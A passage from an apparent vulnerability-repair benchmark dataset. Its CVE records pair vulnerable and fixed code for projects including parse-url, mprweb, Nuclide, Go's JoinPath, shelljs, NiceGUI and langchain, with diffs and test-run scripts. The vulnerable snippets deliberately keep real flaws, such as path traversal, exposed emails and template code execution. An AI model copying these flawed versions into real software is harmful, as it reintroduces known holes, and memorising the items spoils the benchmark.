new_html = page_html[:match.end()] + \"&mode=\" + mode +\\\n+ new_html = page_html[:match.end()] + '&mode={{ mode }}' +\\\n page_html[match.end():]\n return new_html\n else:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-4315:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/psiTurk\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nPYTHONPATH=. /workspace/PoC_env/CVE-2021-4315/bin/python -m pytest tests/test_psiturk.py -k \"test_insert_mode\" --override-ini=\"addopts=\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-4315:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/psiTurk\ngit apply --whitespace=nowarn /workspace/fix.patch\nPYTHONPATH=. /workspace/PoC_env/CVE-2021-4315/bin/python -m pytest tests/test_psiturk.py -k \"not test_insert_mode\" --override-ini=\"addopts=\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-0722", "cve_description": "Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository ionicabizau/parse-url prior to 7.0.0.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ionicabizau/parse-url", "patch_url": ["https://github.com/ionicabizau/parse-url/commit/21c72ab9412228eea753e2abc48f8962707b1fe3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_53_1", "commit": "fa488b2f26715995251c30825398e6aa96a0aadf", "file_path": "lib/index.js", "start_line": 35, "end_line": 49, "snippet": "function parseUrl(url, normalize = false) {\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n stripHash: false\n }\n }\n url = normalizeUrl(url, normalize)\n }\n const parsed = parsePath(url)\n return parsed;\n}"}], "fix_func": [{"id": "fix_js_53_1", "commit": "21c72ab9412228eea753e2abc48f8962707b1fe3", "file_path": "lib/index.js", "start_line": 37, "end_line": 70, "snippet": "const parseUrl = (url, normalize = false) => {\n\n // Constants\n const GIT_RE = /((git@|http(s)?:\\/\\/)([\\w\\.@]+)(\\/|:))(([\\~,\\w,\\-,\\_,\\/]+)(.git){0,1}((\\/){0,1}))/\n\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n stripHash: false\n }\n }\n url = normalizeUrl(url, normalize)\n }\n\n const parsed = parsePath(url)\n\n // Potential git-ssh urls\n if (parsed.protocol === \"file\") {\n const matched = parsed.href.match(GIT_RE)\n if (matched) {\n parsed.protocols = [\"ssh\"]\n parsed.protocol = \"ssh\"\n parsed.resource = matched[4]\n parsed.user = \"git\"\n parsed.pathname = `/${matched[6]}`\n }\n }\n\n return parsed;\n}"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,7 +1,12 @@\n-function parseUrl(url, normalize = false) {\n+const parseUrl = (url, normalize = false) => {\n+\n+ // Constants\n+ const GIT_RE = /((git@|http(s)?:\\/\\/)([\\w\\.@]+)(\\/|:))(([\\~,\\w,\\-,\\_,\\/]+)(.git){0,1}((\\/){0,1}))/\n+\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n+\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n@@ -10,6 +15,20 @@\n }\n url = normalizeUrl(url, normalize)\n }\n+\n const parsed = 
parsePath(url)\n+\n+ // Potential git-ssh urls\n+ if (parsed.protocol === \"file\") {\n+ const matched = parsed.href.match(GIT_RE)\n+ if (matched) {\n+ parsed.protocols = [\"ssh\"]\n+ parsed.protocol = \"ssh\"\n+ parsed.resource = matched[4]\n+ parsed.user = \"git\"\n+ parsed.pathname = `/${matched[6]}`\n+ }\n+ }\n+\n return parsed;\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0722:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/parse-url\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-31185", "cve_description": "mprweb is a hosting platform for the makedeb Package Repository. Email addresses were found to not have been hidden, even if a user had clicked the `Hide Email Address` checkbox on their account page, or during signup. This could lead to an account's email being leaked, which may be problematic if your email needs to remain private for any reason. Users hosting their own mprweb instance will need to upgrade to the latest commit to get this fixed. Users on the official instance will already have this issue fixed.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/makedeb/mprweb", "patch_url": ["https://github.com/makedeb/mprweb/commit/d13e3f2f5a9c0b0f6782f35d837090732026ad77"], "programing_language": "Python", "vul_func": [{"id": "vul_py_213_1", "commit": "908b81a", "file_path": "aurweb/routers/accounts.py", "start_line": 269, "end_line": 357, "snippet": "async def account_register_post(\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n H: str = Form(default=False), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n I: str = Form(default=None), # IRC Nick # noqa: E741\n K: str = Form(default=None), # PGP Key\n L: str = Form(default=aurweb.config.get(\"options\", \"default_lang\")),\n TZ: str = Form(default=aurweb.config.get(\"options\", \"default_timezone\")),\n PK: str = Form(default=None), # SSH PubKey\n CN: bool = Form(default=False),\n UN: bool = Form(default=False),\n ON: bool = Form(default=False),\n captcha: str = Form(default=None),\n captcha_salt: str = Form(...),\n):\n context = await make_variable_context(request, \"Register\")\n args = dict(await request.form())\n\n context = make_account_form_context(context, request, None, args)\n ok, errors = process_account_form(request, request.user, args)\n if not ok:\n # If the field values given do not meet the requirements,\n # return HTTP 400 with an error.\n context[\"errors\"] = errors\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n if not captcha:\n context[\"errors\"] = [\"The CAPTCHA is missing.\"]\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n # Create a user with no password with a resetkey, then send\n # an email off about it.\n resetkey = generate_resetkey()\n\n # By default, we grab the User account type to associate with.\n atype = db.query(\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n\n # Create a user given all parameters available.\n with db.begin():\n user = 
db.create(\n models.User,\n Username=U,\n Email=E,\n HideEmail=H,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n IRCNick=I,\n PGPKey=K,\n LangPreference=L,\n Timezone=TZ,\n CommentNotify=CN,\n UpdateNotify=UN,\n OwnershipNotify=ON,\n ResetKey=resetkey,\n AccountType=atype,\n )\n\n # If a PK was given and either one does not exist or the given\n # PK mismatches the existing user's SSHPubKey.PubKey.\n if PK:\n # Get the second element in the PK, which is the actual key.\n pubkey = PK.strip().rstrip()\n parts = pubkey.split(\" \")\n if len(parts) == 3:\n # Remove the host part.\n pubkey = parts[0] + \" \" + parts[1]\n fingerprint = get_fingerprint(pubkey)\n with db.begin():\n user.ssh_pub_key = models.SSHPubKey(\n UserID=user.ID, PubKey=pubkey, Fingerprint=fingerprint\n )\n\n # Send a reset key notification to the new user.\n WelcomeNotification(user.ID).send()\n\n context[\"complete\"] = True\n context[\"user\"] = user\n return render_template(request, \"register.html\", context)"}], "fix_func": [{"id": "fix_py_213_1", "commit": "d13e3f2", "file_path": "aurweb/routers/accounts.py", "start_line": 269, "end_line": 363, "snippet": "async def account_register_post(\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n H: str = Form(default=\"off\"), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n I: str = Form(default=None), # IRC Nick # noqa: E741\n K: str = Form(default=None), # PGP Key\n L: str = Form(default=aurweb.config.get(\"options\", \"default_lang\")),\n TZ: str = Form(default=aurweb.config.get(\"options\", \"default_timezone\")),\n PK: str = Form(default=None), # SSH PubKey\n CN: bool = Form(default=False),\n UN: bool = Form(default=False),\n ON: bool = Form(default=False),\n captcha: str = Form(default=None),\n captcha_salt: str = Form(...),\n):\n context = await make_variable_context(request, \"Register\")\n args = dict(await request.form())\n\n context = make_account_form_context(context, request, None, args)\n ok, errors = process_account_form(request, request.user, args)\n if not ok:\n # If the field values given do not meet the requirements,\n # return HTTP 400 with an error.\n context[\"errors\"] = errors\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n if not captcha:\n context[\"errors\"] = [\"The CAPTCHA is missing.\"]\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n # Create a user with no password with a resetkey, then send\n # an email off about it.\n resetkey = generate_resetkey()\n\n # By default, we grab the User account type to associate with.\n atype = db.query(\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n\n # Check if we should turn on HideEmail.\n if H == \"on\":\n hide_email = 1\n else:\n hide_email = 0\n\n # Create a user given all parameters available.\n with db.begin():\n user = db.create(\n models.User,\n Username=U,\n Email=E,\n HideEmail=hide_email,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n IRCNick=I,\n PGPKey=K,\n LangPreference=L,\n Timezone=TZ,\n CommentNotify=CN,\n UpdateNotify=UN,\n OwnershipNotify=ON,\n ResetKey=resetkey,\n AccountType=atype,\n )\n\n # If a PK was given and either one does not exist or the given\n # PK mismatches the existing user's SSHPubKey.PubKey.\n if PK:\n # Get the second element in the PK, which is the actual key.\n pubkey 
= PK.strip().rstrip()\n parts = pubkey.split(\" \")\n if len(parts) == 3:\n # Remove the host part.\n pubkey = parts[0] + \" \" + parts[1]\n fingerprint = get_fingerprint(pubkey)\n with db.begin():\n user.ssh_pub_key = models.SSHPubKey(\n UserID=user.ID, PubKey=pubkey, Fingerprint=fingerprint\n )\n\n # Send a reset key notification to the new user.\n WelcomeNotification(user.ID).send()\n\n context[\"complete\"] = True\n context[\"user\"] = user\n return render_template(request, \"register.html\", context)"}], "vul_patch": "--- a/aurweb/routers/accounts.py\n+++ b/aurweb/routers/accounts.py\n@@ -2,7 +2,7 @@\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n- H: str = Form(default=False), # Hide Email\n+ H: str = Form(default=\"off\"), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n@@ -45,13 +45,19 @@\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n \n+ # Check if we should turn on HideEmail.\n+ if H == \"on\":\n+ hide_email = 1\n+ else:\n+ hide_email = 0\n+\n # Create a user given all parameters available.\n with db.begin():\n user = db.create(\n models.User,\n Username=U,\n Email=E,\n- HideEmail=H,\n+ HideEmail=hide_email,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-6333", "cve_description": "The hhvm-attach deep link handler in Nuclide did not properly sanitize the provided hostname parameter when rendering. As a result, a malicious URL could be used to render HTML and other content inside of the editor's context, which could potentially be chained to lead to code execution. This issue affected Nuclide prior to v0.290.0.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/facebook/nuclide", "patch_url": ["https://github.com/facebook/nuclide/commit/65f6bbd683404be1bb569b8d1be84b5d4c74a324"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_198_1", "commit": "ee8e058", "file_path": "pkg/nuclide-hhvm/lib/main.js", "start_line": 80, "end_line": 180, "snippet": " async _debugDeepWithHhvm(params: DeepLinkParams): Promise {\n const {nuclidePath, hackRoot, line, addBreakpoint, source} = params;\n\n if (\n typeof nuclidePath !== 'string' ||\n !nuclideUri.isRemote(nuclidePath) ||\n typeof hackRoot !== 'string'\n ) {\n atom.notifications.addError('Invalid arguments.');\n return;\n }\n\n const pathString = decodeURIComponent(String(nuclidePath));\n const hackRootString = decodeURIComponent(String(hackRoot));\n\n const startDebugger =\n params.noDebugger == null || params.noDebugger !== 'true';\n\n track('nuclide-attach-hhvm-deeplink', {\n pathString,\n line,\n addBreakpoint,\n source,\n });\n\n if (this._remoteProjectsService == null) {\n atom.notifications.addError('The remote project service is unavailable.');\n return;\n } else {\n const remoteProjectsService = this._remoteProjectsService;\n await new Promise(resolve =>\n remoteProjectsService.waitForRemoteProjectReload(resolve),\n );\n }\n\n const host = nuclideUri.getHostname(pathString);\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n ? 
`Connecting to ${host} and attaching debugger...`\n : `Connecting to ${host}...`,\n {\n dismissable: true,\n },\n );\n\n invariant(this._remoteProjectsService != null);\n const remoteConnection = await this._remoteProjectsService.createRemoteConnection(\n {\n host,\n cwd: nuclideUri.getPath(cwd),\n displayTitle: host,\n },\n );\n\n if (remoteConnection == null) {\n atom.notifications.addError(`Could not connect to ${host}`);\n return;\n }\n\n // The hostname might have changed slightly from what was passed in due to\n // DNS lookup, so create a new remote URI rather than using cwd from above.\n const hackRootUri = remoteConnection.getUriOfRemotePath(hackRootString);\n const navUri = remoteConnection.getUriOfRemotePath(\n nuclideUri.getPath(pathString),\n );\n\n // Set the current project root.\n if (this._cwdApi != null) {\n this._cwdApi.setCwd(hackRootUri);\n }\n\n // Open the script path in the editor.\n const lineNumber = parseInt(line, 10);\n if (Number.isNaN(lineNumber)) {\n goToLocation(navUri);\n } else {\n // NOTE: line numbers start at 0, so subtract 1.\n goToLocation(navUri, {line: lineNumber - 1});\n }\n\n if (startDebugger) {\n // Debug the remote HHVM server!\n const debuggerService = await consumeFirstProvider(\n 'nuclide-debugger.remote',\n );\n\n if (addBreakpoint === 'true' && !Number.isNaN(lineNumber)) {\n // Insert a breakpoint if requested.\n // NOTE: Nuclide protocol breakpoint line numbers start at 0, so subtract 1.\n debuggerService.addBreakpoint(navUri, lineNumber - 1);\n }\n\n await debuggerService.startDebugging(\n await getAttachProcessInfo(hackRootUri),\n );\n }\n\n notification.dismiss();\n }\n}"}], "fix_func": [{"id": "fix_js_198_1", "commit": "65f6bbd", "file_path": "pkg/nuclide-hhvm/lib/main.js", "start_line": 80, "end_line": 191, "snippet": " async _debugDeepWithHhvm(params: DeepLinkParams): Promise {\n const {nuclidePath, hackRoot, line, addBreakpoint, source} = params;\n\n if (\n typeof nuclidePath !== 'string' ||\n !nuclideUri.isRemote(nuclidePath) ||\n typeof hackRoot !== 'string'\n ) {\n atom.notifications.addError('Invalid arguments.');\n return;\n }\n\n const pathString = decodeURIComponent(String(nuclidePath));\n const hackRootString = decodeURIComponent(String(hackRoot));\n\n const startDebugger =\n params.noDebugger == null || params.noDebugger !== 'true';\n\n track('nuclide-attach-hhvm-deeplink', {\n pathString,\n line,\n addBreakpoint,\n source,\n });\n\n if (this._remoteProjectsService == null) {\n atom.notifications.addError('The remote project service is unavailable.');\n return;\n } else {\n const remoteProjectsService = this._remoteProjectsService;\n await new Promise(resolve =>\n remoteProjectsService.waitForRemoteProjectReload(resolve),\n );\n }\n\n const host = nuclideUri.getHostname(pathString);\n\n // Allow only valid hostname characters, per RFC 952:\n // https://tools.ietf.org/html/rfc952\n const invalidMatch = host.match(/[^A-Za-z0-9\\-._]+/);\n if (invalidMatch != null) {\n atom.notifications.addError(\n 'The specified host name contained invalid characters.',\n );\n return;\n }\n\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n ? 
`Connecting to ${host} and attaching debugger...`\n : `Connecting to ${host}...`,\n {\n dismissable: true,\n },\n );\n\n invariant(this._remoteProjectsService != null);\n const remoteConnection = await this._remoteProjectsService.createRemoteConnection(\n {\n host,\n cwd: nuclideUri.getPath(cwd),\n displayTitle: host,\n },\n );\n\n if (remoteConnection == null) {\n atom.notifications.addError(`Could not connect to ${host}`);\n return;\n }\n\n // The hostname might have changed slightly from what was passed in due to\n // DNS lookup, so create a new remote URI rather than using cwd from above.\n const hackRootUri = remoteConnection.getUriOfRemotePath(hackRootString);\n const navUri = remoteConnection.getUriOfRemotePath(\n nuclideUri.getPath(pathString),\n );\n\n // Set the current project root.\n if (this._cwdApi != null) {\n this._cwdApi.setCwd(hackRootUri);\n }\n\n // Open the script path in the editor.\n const lineNumber = parseInt(line, 10);\n if (Number.isNaN(lineNumber)) {\n goToLocation(navUri);\n } else {\n // NOTE: line numbers start at 0, so subtract 1.\n goToLocation(navUri, {line: lineNumber - 1});\n }\n\n if (startDebugger) {\n // Debug the remote HHVM server!\n const debuggerService = await consumeFirstProvider(\n 'nuclide-debugger.remote',\n );\n\n if (addBreakpoint === 'true' && !Number.isNaN(lineNumber)) {\n // Insert a breakpoint if requested.\n // NOTE: Nuclide protocol breakpoint line numbers start at 0, so subtract 1.\n debuggerService.addBreakpoint(navUri, lineNumber - 1);\n }\n\n await debuggerService.startDebugging(\n await getAttachProcessInfo(hackRootUri),\n );\n }\n\n notification.dismiss();\n }\n}"}], "vul_patch": "--- a/pkg/nuclide-hhvm/lib/main.js\n+++ b/pkg/nuclide-hhvm/lib/main.js\n@@ -34,6 +34,17 @@\n }\n \n const host = nuclideUri.getHostname(pathString);\n+\n+ // Allow only valid hostname characters, per RFC 952:\n+ // https://tools.ietf.org/html/rfc952\n+ const invalidMatch = host.match(/[^A-Za-z0-9\\-._]+/);\n+ if (invalidMatch != null) {\n+ atom.notifications.addError(\n+ 'The specified host name contained invalid characters.',\n+ );\n+ return;\n+ }\n+\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-32190", "cve_description": "JoinPath and URL.JoinPath do not remove ../ path elements appended to a relative path. 
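The Nuclide fix above rejects any hostname containing characters outside the RFC 952 set before it is ever rendered or connected to. The same allow-list expressed in Python (function name assumed):

    import re

    def validate_host(host):
        if re.search(r"[^A-Za-z0-9\-._]", host):
            raise ValueError("host name contains invalid characters")
        return host

    validate_host("dev-server.example.com")   # passes
    # validate_host("evil<img src=x>") would raise before any rendering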
For example, JoinPath(\"https://go.dev\", \"../go\") returns the URL \"https://go.dev/../go\", despite the JoinPath documentation stating that ../ path elements are removed from the result.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/go", "patch_url": ["https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec"], "programing_language": "Go", "vul_func": [{"id": "vul_go_90_1", "commit": "d2bcb22", "file_path": "src/net/url/url.go", "start_line": "1193", "end_line": "1206", "snippet": "func (u *URL) JoinPath(elem ...string) *URL {\n\turl := *u\n\tif len(elem) > 0 {\n\t\telem = append([]string{u.EscapedPath()}, elem...)\n\t\tp := path.Join(elem...)\n\t\t// path.Join will remove any trailing slashes.\n\t\t// Preserve at least one.\n\t\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n\t\t\tp += \"/\"\n\t\t}\n\t\turl.setPath(p)\n\t}\n\treturn &url\n}"}], "fix_func": [{"id": "fix_go_90_1", "commit": "2833550", "file_path": "src/net/url/url.go", "start_line": "1193", "end_line": "1212", "snippet": "func (u *URL) JoinPath(elem ...string) *URL {\n\telem = append([]string{u.EscapedPath()}, elem...)\n\tvar p string\n\tif !strings.HasPrefix(elem[0], \"/\") {\n\t\t// Return a relative path if u is relative,\n\t\t// but ensure that it contains no ../ elements.\n\t\telem[0] = \"/\" + elem[0]\n\t\tp = path.Join(elem...)[1:]\n\t} else {\n\t\tp = path.Join(elem...)\n\t}\n\t// path.Join will remove any trailing slashes.\n\t// Preserve at least one.\n\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n\t\tp += \"/\"\n\t}\n\turl := *u\n\turl.setPath(p)\n\treturn &url\n}"}], "vul_patch": "--- a/src/net/url/url.go\n+++ b/src/net/url/url.go\n@@ -1,14 +1,20 @@\n func (u *URL) JoinPath(elem ...string) *URL {\n+\telem = append([]string{u.EscapedPath()}, elem...)\n+\tvar p string\n+\tif !strings.HasPrefix(elem[0], \"/\") {\n+\t\t// Return a relative path if u is relative,\n+\t\t// but ensure that it contains no ../ elements.\n+\t\telem[0] = \"/\" + elem[0]\n+\t\tp = path.Join(elem...)[1:]\n+\t} else {\n+\t\tp = path.Join(elem...)\n+\t}\n+\t// path.Join will remove any trailing slashes.\n+\t// Preserve at least one.\n+\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n+\t\tp += \"/\"\n+\t}\n \turl := *u\n-\tif len(elem) > 0 {\n-\t\telem = append([]string{u.EscapedPath()}, elem...)\n-\t\tp := path.Join(elem...)\n-\t\t// path.Join will remove any trailing slashes.\n-\t\t// Preserve at least one.\n-\t\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n-\t\t\tp += \"/\"\n-\t\t}\n-\t\turl.setPath(p)\n-\t}\n+\turl.setPath(p)\n \treturn &url\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0144", "cve_description": "shelljs is vulnerable to Improper Privilege Management", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, 
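The Go JoinPath fix above works by temporarily anchoring a relative base at "/", so the path cleaner consumes leading "../" elements, then stripping the anchor. A rough posixpath analogue (trailing-slash preservation omitted):

    import posixpath

    def join_url_path(base, *elems):
        if not base.startswith("/"):
            # Anchor, clean, then drop the artificial leading "/".
            return posixpath.normpath(posixpath.join("/" + base, *elems))[1:]
        return posixpath.normpath(posixpath.join(base, *elems))

    assert join_url_path("go", "../go") == "go"   # no "../go" leak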
"CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/shelljs/shelljs", "patch_url": ["https://github.com/shelljs/shelljs/commit/d919d22dd6de385edaa9d90313075a77f74b338c"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_258_1", "commit": "fcf1651", "file_path": "src/exec.js", "start_line": 51, "end_line": 51, "snippet": " fs.writeFileSync(paramsFile, JSON.stringify(paramsToSerialize), 'utf8');"}], "fix_func": [{"id": "fix_js_258_1", "commit": "d919d22dd6de385edaa9d90313075a77f74b338c", "file_path": "src/exec.js", "start_line": 60, "end_line": 65, "snippet": " function writeFileLockedDown(filePath, data) {\n fs.writeFileSync(filePath, data, {\n encoding: 'utf8',\n mode: parseInt('600', 8),\n });\n }"}, {"id": "fix_js_258_2", "commit": "d919d22dd6de385edaa9d90313075a77f74b338c", "file_path": "src/exec.js", "start_line": 66, "end_line": 68, "snippet": " writeFileLockedDown(stdoutFile, '');\n writeFileLockedDown(stderrFile, '');\n writeFileLockedDown(paramsFile, JSON.stringify(paramsToSerialize));"}], "vul_patch": "--- a/src/exec.js\n+++ b/src/exec.js\n@@ -1 +1,6 @@\n- fs.writeFileSync(paramsFile, JSON.stringify(paramsToSerialize), 'utf8');\n+ function writeFileLockedDown(filePath, data) {\n+ fs.writeFileSync(filePath, data, {\n+ encoding: 'utf8',\n+ mode: parseInt('600', 8),\n+ });\n+ }\n\n--- /dev/null\n+++ b/src/exec.js\n@@ -0,0 +1,3 @@\n+ writeFileLockedDown(stdoutFile, '');\n+ writeFileLockedDown(stderrFile, '');\n+ writeFileLockedDown(paramsFile, JSON.stringify(paramsToSerialize));\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-21618", "cve_description": "NiceGUI is an easy-to-use, Python-based UI framework. Prior to 2.9.1, authenticating with NiceGUI logged in the user for all browsers, including browsers in incognito mode. 
This vulnerability is fixed in 2.9.1.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/zauberzeug/nicegui", "patch_url": ["https://github.com/zauberzeug/nicegui/commit/1621a4ba6a06676b8094362d36623551e651adc1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_358_1", "commit": "c063791b21a51dc966da654bd9545e9c5506fa8f", "file_path": "nicegui/air.py", "start_line": 50, "end_line": 77, "snippet": " async def _handle_http(data: Dict[str, Any]) -> Dict[str, Any]:\n headers: Dict[str, Any] = data['headers']\n headers.update({'Accept-Encoding': 'identity', 'X-Forwarded-Prefix': data['prefix']})\n url = 'http://test' + data['path']\n request = self.client.build_request(\n data['method'],\n url,\n params=data['params'],\n headers=headers,\n content=data['body'],\n )\n response = await self.client.send(request)\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n (f'const extraHeaders = {{ \"fly-force-instance-id\" : \"{instance_id}\" }};').encode(),\n )\n match = re.search(b'const query = ({.*?})', content)\n if match:\n new_js_object = match.group(1).decode().rstrip('}') + \", 'fly_instance_id' : '\" + instance_id + \"'}\"\n content = content.replace(match.group(0), f'const query = {new_js_object}'.encode())\n compressed = gzip.compress(content)\n response.headers.update({'content-encoding': 'gzip', 'content-length': str(len(compressed))})\n return {\n 'status_code': response.status_code,\n 'headers': response.headers.multi_items(),\n 'content': compressed,\n }"}], "fix_func": [{"id": "fix_py_358_1", "commit": "1621a4ba6a06676b8094362d36623551e651adc1", "file_path": "nicegui/air.py", "start_line": 50, "end_line": 78, "snippet": " async def _handle_http(data: Dict[str, Any]) -> Dict[str, Any]:\n headers: Dict[str, Any] = data['headers']\n headers.update({'Accept-Encoding': 'identity', 'X-Forwarded-Prefix': data['prefix']})\n url = 'http://test' + data['path']\n request = self.client.build_request(\n data['method'],\n url,\n params=data['params'],\n headers=headers,\n content=data['body'],\n )\n response = await self.client.send(request)\n self.client.cookies.clear()\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n (f'const extraHeaders = {{ \"fly-force-instance-id\" : \"{instance_id}\" }};').encode(),\n )\n match = re.search(b'const query = ({.*?})', content)\n if match:\n new_js_object = match.group(1).decode().rstrip('}') + \", 'fly_instance_id' : '\" + instance_id + \"'}\"\n content = content.replace(match.group(0), f'const query = {new_js_object}'.encode())\n compressed = gzip.compress(content)\n response.headers.update({'content-encoding': 'gzip', 'content-length': str(len(compressed))})\n return {\n 'status_code': response.status_code,\n 'headers': response.headers.multi_items(),\n 'content': compressed,\n }"}], "vul_patch": "--- a/nicegui/air.py\n+++ b/nicegui/air.py\n@@ -10,6 +10,7 @@\n content=data['body'],\n )\n response = await self.client.send(request)\n+ self.client.cookies.clear()\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-36281", "cve_description": "An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file 
to load_prompt. This is related to __subclasses__ or a template.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/langchain-ai/langchain", "patch_url": ["https://github.com/langchain-ai/langchain/commit/22abeb9f6cc555591bf8e92b5e328e43aa07ff6c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_303_1", "commit": "b642d00", "file_path": "libs/langchain/langchain/prompts/loading.py", "start_line": 111, "end_line": 116, "snippet": "def _load_prompt(config: dict) -> PromptTemplate:\n \"\"\"Load the prompt template from config.\"\"\"\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n return PromptTemplate(**config)"}], "fix_func": [{"id": "fix_py_303_1", "commit": "22abeb9f6cc555591bf8e92b5e328e43aa07ff6c", "file_path": "libs/langchain/langchain/prompts/loading.py", "start_line": 111, "end_line": 127, "snippet": "def _load_prompt(config: dict) -> PromptTemplate:\n \"\"\"Load the prompt template from config.\"\"\"\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n\n template_format = config.get(\"template_format\", \"f-string\")\n if template_format == \"jinja2\":\n # Disabled due to:\n # https://github.com/langchain-ai/langchain/issues/4394\n raise ValueError(\n f\"Loading templates with '{template_format}' format is no longer supported \"\n f\"since it can lead to arbitrary code execution. Please migrate to using \"\n f\"the 'f-string' template format, which does not suffer from this issue.\"\n )\n\n return 